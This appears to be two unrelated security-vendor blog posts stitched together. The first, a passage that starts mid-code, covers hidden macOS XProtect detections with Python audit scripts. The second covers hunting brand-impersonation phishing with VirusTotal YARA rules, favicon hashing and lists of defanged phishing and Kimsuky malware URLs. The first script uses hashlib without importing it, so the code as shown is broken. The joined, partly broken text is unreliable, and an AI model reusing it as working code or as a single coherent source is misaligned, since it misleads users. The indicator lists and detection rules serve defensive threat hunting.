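import plistlib
import re
from pathlib import Path

# Added example, not Apple's code or the original post's. Default location of
# the XProtect bundle on current macOS releases; pass another path to inspect
# a copy pulled from a different host.
XPROTECT_BUNDLE = Path("/Library/Apple/System/Library/CoreServices/XProtect.bundle")

# Matches "rule name", "private rule name", "global private rule name" at the
# start of a line. Approximation: a rule keyword inside /* */ is also counted.
RULE_RE = re.compile(
    r"^\s*(?:private\s+|global\s+)*rule\s+([A-Za-z_][A-Za-z0-9_]*)", re.MULTILINE
)


def yara_rule_names(text: str) -> list[str]:
    """Names of all rule declarations in a YARA source file."""
    return RULE_RE.findall(text)


def count_yara_rules(text: str) -> int:
    return len(yara_rule_names(text))


def xprotect_status(bundle: Path = XPROTECT_BUNDLE) -> dict:
    """Version string, SHA-256 of XProtect.yara, and rule inventory of a bundle.

    Two bundles whose yara_sha256 values match carry identical signatures no
    matter what CFBundleShortVersionString says.
    """
    info = bundle / "Contents" / "Info.plist"
    yara = bundle / "Contents" / "Resources" / "XProtect.yara"
    with info.open("rb") as fh:
        plist = plistlib.load(fh)
    data = yara.read_bytes()
    text = data.decode("utf-8", errors="replace")
    return {
        "version": plist.get("CFBundleShortVersionString"),
        "yara_sha256": hashlib.sha256(data).hexdigest(),
        "rule_count": count_yara_rules(text),
        "rules": yara_rule_names(text),
    }


def diff_rules(old: dict, new: dict) -> dict:
    """Compare two xprotect_status() results captured at different times or hosts."""
    old_set, new_set = set(old["rules"]), set(new["rules"])
    return {
        "same_yara_file": old["yara_sha256"] == new["yara_sha256"],
        "added": sorted(new_set - old_set),
        "removed": sorted(old_set - new_set),
    }


if __name__ == "__main__":
    status = xprotect_status()
    print(f"XProtect {status['version']}: {status['rule_count']} rules, "
          f"XProtect.yara sha256 {status['yara_sha256']}")
```

Run it on each Mac (or on bundles copied off them) and store the JSON; a fleet where every host reports the same yara_sha256 across several version numbers is exactly the situation described above.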

2. XProtectRemediator | Hiding Infections After-the-Fact

Despite the lack of updates to Apple’s primary malware blocking tool, the company has been updating XProtectRemediator, its replacement for MRT, more regularly. XProtectRemediator runs on a schedule of roughly every six hours, looking for a small collection of known malware families.

While that increased attention is an improvement over the old MRT.app, the focus on remediation rather than blocking should concern enterprise security teams. Six hours is far too long for an infostealer to sit inside the organization, particularly as infostealers need only seconds to do their work. Session cookies are a primary target for threat actors looking to worm their way further into an organization and turn the compromise of a single Mac into a serious breach, as happened recently at CircleCI.

As noted above, there is no user interface on macOS for understanding what malware has been remediated, or when or how it was introduced into the system. However, as of macOS 13 Ventura, system administrators without third-party visibility tools can attempt to leverage eslogger, the Endpoint Security event logging tool that ships with that release.

Unfortunately, eslogger was not built with enterprise scale in mind. It will require some building of infrastructure and external tools in order to bring results from across a fleet into a central database that could be monitored and mined for data. There are better 3rd party tools built for the job that will require less investment and give greater return.

In either case, unless security teams are proactive, Apple’s XProtectRemediator will silently remove malware that it discovers without alerting the user or the administrator that an infection had ever occurred. Similarly, the tool will neither warn of nor log suspicious or malicious activity that it hasn’t been explicitly programmed to detect.

Relying on silent remediation is a high-risk strategy for both enterprises and Apple. A risk of a false positive in this situation could cause serious harm to users and businesses, so it is likely that Apple has designed the tool extremely conservatively in terms of what it will detect and silently remove.

For enterprises, the inability to receive alerts and the difficulty of inspecting logs means there is little chance of catching infections missed by XProtectRemediator, of tracking down the root cause of those that it removes, or of further investigating the incident and its impact on the organization.

3. XProtectBehaviorService | Hidden Behavioral Detections

A recent addition to Apple’s malware detection technologies which the company has not publicly documented yet goes by the name of XProtectBehaviorService.

At present, the service merely silently logs details of applications that violate certain pre-programmed behavioral rules, currently defined in /usr/libexec/syspolicyd.

These rules, internally referred to as “bastion rules”, log violations in a hidden sqlite database located at /var/protected/xprotect/XPdb. It is commendable that Apple is logging access to data held in enterprise applications like Slack and Teams, as well as various browser and chat apps. The question remains, however, as to what access Apple intends to give users – and more importantly admin, IT and security teams – to this service and the information it gathers as it develops further.

For example, those logs were put to good use recently by incident responders investigating an APT intrusion that infected four macOS Ventura systems and which was neither blocked by XProtect nor removed by XProtectRemediator.

Although that data is now there to be found by incident responders, it falls on those responsible for security to gather it and learn how to use it. It serves as a case in point of how IT teams that continue to rely entirely on Apple for protection must still proactively engage with the macOS devices in their fleet and mine them for the hidden logs and telemetry that Apple stashes away.
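Since Apple has not documented the schema of the XPdb store, an investigator’s first step is simply to see what is in it. The script below is an added example for this post, not Apple’s code: it opens an SQLite file read-only, discovers its tables from sqlite_master, dumps every row, and greps the result for a string of interest such as a suspect path. It assumes nothing about table or column names, so it will work whatever Apple changes in the store. Reading /var/protected/xprotect/XPdb requires root; the default path is taken from the description above.

```python
import sqlite3
from pathlib import Path

# Added example, not Apple's tooling or the original post's code. Location of
# the XProtectBehaviorService database as described above (root required).
XPDB_PATH = Path("/var/protected/xprotect/XPdb")


def open_readonly(path: Path) -> sqlite3.Connection:
    """Open via URI in read-only mode so the live database is never written to."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def list_tables(conn: sqlite3.Connection) -> list[str]:
    """Discover user tables from sqlite_master; no schema knowledge assumed."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master "
        "WHERE type='table' AND name NOT LIKE 'sqlite_%' ORDER BY name"
    ).fetchall()
    return [r[0] for r in rows]


def dump_database(path: Path) -> dict[str, dict]:
    """Return {table: {"columns": [...], "rows": [[...], ...]}} for every table."""
    out: dict[str, dict] = {}
    conn = open_readonly(path)
    try:
        for table in list_tables(conn):
            # Names come from sqlite_master, not from user input; quoting keeps
            # unusual names (spaces, reserved words) working.
            cur = conn.execute(f'SELECT * FROM "{table}"')
            columns = [d[0] for d in cur.description]
            out[table] = {"columns": columns, "rows": [list(r) for r in cur.fetchall()]}
    finally:
        conn.close()
    return out


def grep_dump(dump: dict[str, dict], needle: str) -> list[tuple[str, list]]:
    """Rows in any table whose text form contains needle (e.g. a path or bundle ID)."""
    hits = []
    for table, content in dump.items():
        for row in content["rows"]:
            if any(needle in str(cell) for cell in row):
                hits.append((table, row))
    return hits


if __name__ == "__main__":
    import json
    import sys

    path = Path(sys.argv[1]) if len(sys.argv) > 1 else XPDB_PATH
    print(json.dumps(dump_database(path), indent=2, default=str))
```

Copy the database off the host first if you want to avoid touching it in place; the read-only URI guards against accidental writes but does not stop the system from updating the file underneath you.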

Conclusion

Apple’s approach to security is, like many other things it does, different to other OS vendors. That’s neither a good thing nor a bad thing in itself; what matters is that admins are aware of how their OS is dealing with security events. A nice, quiet system doesn’t necessarily mean a safe and secure system.

Knowing what’s happening on the company’s endpoints is the first step to securing them, and there are a lot more security-related events occurring under the hood of macOS than is obvious to the casual observer.

As a vendor, it should come as no surprise that we urge organizations to deploy additional security on their macOS devices: naturally, we believe in what we do and the reasons for doing it. But even those that are not yet ready to heed that message can take away a vital lesson from this discussion: actively engage with the Macs in the fleet, mine them for logs and ensure that the in-house security team knows at least as much as Apple does about what’s happening on the organization’s Macs.

To learn more about how SentinelOne can help protect the Macs in your fleet, contact us or request a free demo.

Illicit Brand Impersonation | A Threat Hunting Approach

Since the start of 2023, brand impersonation has become the center of many questions we receive from everyday network defenders. While at the start of the year we reported on the heavy spike in malicious Google search ads, the activity continues to this day across many platforms, and does not get as much attention as it deserves. Additionally, while tracking more capable and often state-sponsored threat actors, we continually observe brands being impersonated for illicit use, including credential phishing and malware delivery.

Consequently, organizations find themselves grappling with two critical challenges: first, identifying and thwarting illicit brand impersonation aimed at targeting them, and second, effectively safeguarding their networks and users. Security and threat researchers face a similar, albeit magnified, responsibility as they handle these concerns for numerous entities.

Let’s explore some examples of opportunistic and targeted threat actors impersonating trusted brands and how security researchers can make use of new tooling for the purposes of hunting and tracking them moving forward.

New Tools and Monitoring Techniques

VirusTotal has released a new feature called NetIoc, essentially expanding the well known YARA engine to network telemetry and data. VirusTotal is a core resource for researchers, security vendors, network defenders, and even investigative journalists. With the incorporation of this new capability, it becomes imperative for others to familiarize themselves with and harness its full potential. Moreover, it exemplifies an approach that other security tools can and, indeed, should emulate in the context of engineering solutions for network data detection opportunities.

Many opportunities for hunting my favorite threat actors come to mind with this new capability. While APTs consume most of my attention, they are not the most common threat or concern for the majority of network defenders. For that, let’s look at some malicious activity impacting far more organizations.

Mimicking Trusted Pages

In February of this year, we wrote about a campaign targeting cloud service credentials, specifically AWS logins. While the delivery of this is quite rare for the moment, being a direct Google advertisement, attackers continue to innovate through many other ways including phishing emails and non-Google ads to name only two.

Fake AWS Login Page

So how can we detect illicit login pages such as these? First, we have to note that many phishing pages reuse the content from the services they mimic, such as URL icons, body content, and images. If the VirusTotal scanner catches it fast enough, we can track down some commodity activity with this in mind.

import "vt"
rule aws_monitor {
    condition:
        vt.net.domain.new_domain and
        (vt.net.url.favicon.dhash == "4026d4f494f8738c" // AWS Name Icon
        or
        vt.net.url.favicon.dhash == "c8e3b88aaa88cbf8" // AWS Docs Icon
        or
        for any link in vt.net.url.outgoing_links: ( link matches /signin.aws.amazon.com.*/ )
        or
        vt.net.domain.raw matches /aws/)
}

This rule will trigger on any newly seen domain whose URL carries the same favicon used on the AWS login page or docs page, contains an outgoing link to the legitimate AWS sign-in page, or whose raw domain name contains the string “aws”.

The main fear here is the potential for false positives or negatives. That can be tuned by adding conditions (vt.net.domain.new_domain, for example, weeds out hits on long-established legitimate domains), by filtering on VT tags, or simply by loosening or tightening the individual conditions.

In many cases we’ve observed, a reuse of the favicon combined with a new domain can be quite wide and catch lots of interesting activity.

import "vt"
rule aws_monitor_2 {
    condition:
        vt.net.domain.new_domain and
        (vt.net.url.favicon.dhash == "4026d4f494f8738c" //AWS Name Icon
        or
        vt.net.url.favicon.dhash == "c8e3b88aaa88cbf8" //AWS Docs Icon
        )
}

AWS is just one example; threat hunters could instead apply the same approach to less common pages of value, such as download sites or internal intranet employee logins.
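To write the favicon condition for a brand of your own you need its dhash value. VirusTotal computes that server-side, but the algorithm is the standard difference hash, and the following dependency-free implementation is an added example for this post, not VirusTotal’s code or the original post’s: it downscales a grayscale image to 9×8, sets one bit per pair of horizontally adjacent pixels, and returns the 64-bit hash as 16 hex characters, plus a Hamming distance for near-duplicate comparison. VirusTotal’s exact preprocessing (image decoder, resampling filter) is not documented on this page, so treat hashes from this code as comparable with each other rather than guaranteed to equal VT’s value for the same icon. The favicon used below is constructed for the example.

```python
# Added example, not VirusTotal's implementation or the original post's code.
Gray = list[list[int]]  # rows of 0..255 luminance values


def resize_average(img: Gray, width: int, height: int) -> list[list[float]]:
    """Box-average downscale to width x height. Works for any source size >= 1x1;
    when the source is smaller than the target, blocks simply repeat pixels."""
    src_h, src_w = len(img), len(img[0])
    out = []
    for ty in range(height):
        y0 = ty * src_h // height
        y1 = max((ty + 1) * src_h // height, y0 + 1)
        row = []
        for tx in range(width):
            x0 = tx * src_w // width
            x1 = max((tx + 1) * src_w // width, x0 + 1)
            block = [img[y][x] for y in range(y0, y1) for x in range(x0, x1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


def dhash(img: Gray, hash_size: int = 8) -> str:
    """Row-wise difference hash. For each of hash_size rows the image is reduced
    to hash_size+1 pixels; a bit is 1 when the right pixel is brighter than the
    left. Returned as hex, row-major, most significant bit first."""
    small = resize_average(img, hash_size + 1, hash_size)
    bits = 0
    for row in small:
        for x in range(hash_size):
            bits = (bits << 1) | (1 if row[x + 1] > row[x] else 0)
    return f"{bits:0{hash_size * hash_size // 4}x}"


def hamming(h1: str, h2: str) -> int:
    """Number of differing bits between two hex dhash strings."""
    return bin(int(h1, 16) ^ int(h2, 16)).count("1")


def looks_like_brand(candidate: str, reference: str, max_distance: int = 4) -> bool:
    """Near-duplicate test for local triage. The VT rule above needs exact equality;
    a small distance catches icons that were re-encoded or lightly edited."""
    return hamming(candidate, reference) <= max_distance


def constructed_icon(size: int = 32, shift: int = 0) -> Gray:
    """Constructed sample favicon: dark background with a bright square that can
    be shifted down a few pixels to imitate a re-cropped copy."""
    img = [[20] * size for _ in range(size)]
    for y in range(8 + shift, 24 + shift):
        for x in range(8, 24):
            img[y][x] = 230
    return img


if __name__ == "__main__":
    reference = dhash(constructed_icon())
    copy = dhash(constructed_icon(shift=1))
    print(f"reference {reference}, shifted copy {copy}, "
          f"distance {hamming(reference, copy)}, match {looks_like_brand(copy, reference)}")
```

Feed it the luminance of your real favicon (any image library can give you that) and put the resulting string into the rule; keep the Hamming-distance check for local hunting where a phishing kit has re-saved the icon at a different size.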

Reused Characteristics of Infrastructure – Commodity Targeting

One useful way to identify automated and often large-scale phishing campaign infrastructure is through monitoring and alerting on actor specific characteristics of their phishing sites.

Earlier this month Malwarebytes reported on malicious Google ads mimicking USPS with very realistic links, ultimately seeking mass collection of financial details. Looking into one of these domains (super-trackings[.]com), we notice a Yandex tracker ID of the kind normally used for website analytics; in this case, however, the ID is owned by the threat actor behind the USPS phishing campaign. The tracker is reused across the actor’s tracking.php files rather than on the domain landing pages.

Yandex Tracker 93030690

We can look back historically by searching for the tracker directly in VirusTotal. With many URL results, we can extract the following unreported phishing domains tied to the same actor:

uspps-onlynee[.]biz
hetclick[.]biz
uspps-only[.]ink
www.uspps-only[.]ink
super-trackings[.]com
uspps-onlyne[.]ink
usps.tracking-check[.]me
tracking-checks[.]me
goodstracks[.]me
usps-onlines[.]biz
diy-trackng[.]com

Instead of querying VirusTotal manually for this tracker within new URLs, let’s instead monitor proactively to get alerts as soon as they are seen. For that, we can make use of a very simple rule monitoring for that same tracker.

import "vt"
rule usps_phisher_tracker {
    condition:
        for any tracker in vt.net.url.trackers: (
          tracker.id == "93030690")
}

A tracker can easily be changed by an actor, but the example above was used by the attacker from April to July 2023, so trackers are evidently carried over into new campaigns more often than one might expect, depending of course on the attacker and the campaign.
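The same tracker pivot works on page source you already have, whether from a crawler, a proxy or a sandbox, without waiting for the URL to reach VirusTotal. The code below is an added example for this post, not VirusTotal’s or the original post’s: it extracts Yandex Metrika counter IDs from HTML using the standard embed forms (the ym(<id>, "init", ...) call, the noscript mc.yandex.ru/watch/<id> pixel, and the older new Ya.Metrika({id: ...}) constructor) and matches them against a watchlist. The watchlist entry is the ID from the USPS campaign above; the three pages are constructed samples, not real captures, with URLs defanged in the style of the list above.

```python
import re

# Added example, not the original post's code or VirusTotal's.
# Standard Yandex Metrika embed forms. IDs are numeric; 5-10 digits covers the
# counters seen in practice while rejecting obvious non-IDs.
YM_CALL = re.compile(r"""\bym\(\s*(\d{5,10})\s*,\s*["']init["']""", re.IGNORECASE)
YM_PIXEL = re.compile(r"mc\.yandex\.(?:ru|com)/watch/(\d{5,10})")
YM_LEGACY = re.compile(r"Ya\.Metrika2?\(\s*\{\s*id\s*:\s*(\d{5,10})")


def extract_yandex_trackers(html: str) -> set[str]:
    """All Metrika counter IDs referenced anywhere in a page's source."""
    ids: set[str] = set()
    for pattern in (YM_CALL, YM_PIXEL, YM_LEGACY):
        ids.update(pattern.findall(html))
    return ids


def match_watchlist(pages: dict[str, str], watchlist: set[str]) -> list[tuple[str, str]]:
    """(url, tracker_id) for every page carrying a watched tracker, in input order."""
    hits = []
    for url, html in pages.items():
        for tid in sorted(extract_yandex_trackers(html) & watchlist):
            hits.append((url, tid))
    return hits


WATCHLIST = {"93030690"}  # the USPS-impersonation actor's counter, per the campaign above

# Constructed sample pages for this example (not real captures).
SAMPLE_PAGES = {
    "hxxp://super-trackings[.]com/tracking.php": """<html><head>
      <script type="text/javascript">
        (function(m,e,t,r,i,k,a){ /* loader */ })(window, document, "script",
            "https://mc.yandex.ru/metrika/tag.js", "ym");
        ym(93030690, "init", {clickmap:true, trackLinks:true});
      </script></head><body>
      <noscript><div><img src="https://mc.yandex.ru/watch/93030690"
           style="position:absolute; left:-9999px;" alt="" /></div></noscript>
      </body></html>""",
    "hxxp://example-shop[.]test/": """<html><head>
      <script>ym(12345678, "init", {});</script></head><body>legit shop</body></html>""",
    "hxxp://landing[.]test/": "<html><body>no analytics here</body></html>",
}


if __name__ == "__main__":
    for url, tid in match_watchlist(SAMPLE_PAGES, WATCHLIST):
        print(f"{url} -> Yandex tracker {tid}")
```

Because a tracker ID is also a pivot for legitimate sites, keep the watchlist to IDs you have tied to an actor, as was done above, rather than alerting on every Metrika counter.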

Reused Characteristics of Infrastructure – APTs

Even our more interesting APTs can be tracked through similar reuse of characteristics across their campaigns. Let’s take a look at Kimsuky, one of a number of North Korean attributed threat actors we actively monitor.

In May of this year, we wrote about Kimsuky’s evolving reconnaissance capabilities in a new global campaign, which made use of a new malware component we call ReconShark. In some of the malicious URLs, we can see the actor making use of a config.php file that reuses a small script: it displays a warning to enable JavaScript and serves as the input form for the credential theft functionality.

Kimsuky’s config.php

The new VT templates save us time here, as we can hit a single button to get the rule nearly written for us:

VirusTotal NetIoc Template

Passing in our config.php SHA256 hash, and renaming, we get the following rule:

import "vt"
rule apt_nk_kimsuky_phishing_script {
    condition:
        vt.net.url.new_url and
        vt.net.url.downloaded_file.sha256 == "256fa5009e8e82258876325b7d36f41cc3e74e85627663206b042eec8736ce6a"
}

While beta testing NetIoc with this rule, the file triggered across many unreported Kimsuky controlled URLs, and can also be found going back multiple years. In fact, while testing live detections, MalwareHunterTeam also happened to catch one, highlighting the pivot potential to malicious Kimsuky attributed .hwp documents. This domain was later reported on by the AhnLab team. So not only does the technique work, it can lead to the discovery of interesting new APT brand-impersonating campaigns.

MalwareHunterTeam Kimsuky Linked Tweet

Here is a list of Domains/URLs which contain our Kimsuky .php file. Be warned, some of these are legitimate but compromised domains and go back a few years:

namsouth[.]com
nknews[.]pro/config.php
reasope[.]org/config.php
voesami[.]com/config.php
bit-albania[.]com/config.php
yonsei[.]lol/sss.php
jacobsenfamilyholdings[.]com/config.php
okbus.or[.]kr/config/config.php
renaissancenft[.]io/wp-content/plugins/download-plugin/plugins.php
stmwa[.]de/work/config/data.php
csmss[.]org/admin/uploads/award/award28.php
167.172.113[.]157/
108.179.214[.]134/
174.138.30[.]233/
absolutemedia[.]net.au/
absolutemedia[.]net.au/testing/wp-content/intelmanagertools.exe
absolutemedia[.]net.au/testing/wp-includes/Spectrum
absolutemedia[.]net.au/testing/flash-x32-adobe-add-on.exedl.netprog.net
absolutemedia[.]net.au/testing/flash-x32-Adobe-add-on.exe
eskulap-jarocin[.]pl/
blogtify[.]com/wp-includes/config.php
kevinspie.co[.]kr/data/category/faq/faq.php
hankevin.cafe24[.]com/data/category/faq/faq.php
educacionit[.]com/images-clientes/4O4.php
naturamosana[.]be/css/main.php
wincenty-faber[.]pl/ksiki/ksiki-dla-dzieci
wincenty-faber[.]pl/dla-dzieci
escolarainhadleonor[.]eu/aee/
wincenty-faber[.]pl/dla-dzieci/publikowane-w-ksikach/90
217.219.131[.]139/db.php
chromatogramma[.]ru/book/export/html/3
aprendizajevirtual.une[.]net.co/lang/language.php

This approach, again, may need fine-tuning depending on context, but it offers a good example of one way to do such tracking. There are many other methods available for successfully tracking Kimsuky brand impersonation and other actors including hostname similarities against their normally targeted organizations, or even URL patterns of known toolkits to name a few. Happy Hunting!

Conclusion

The persistent use of brand impersonation by opportunistic and sophisticated threat actors for illicit activities like credential phishing and malware distribution warrants greater awareness and technical capabilities.

By leveraging the latest tooling and staying vigilant, security and threat researchers can play a pivotal role in mitigating these risks for numerous organizations. As we continue to confront these challenges, it is essential to foster collaboration, knowledge sharing, and innovative solutions to stay ahead in the ever-evolving threat landscape.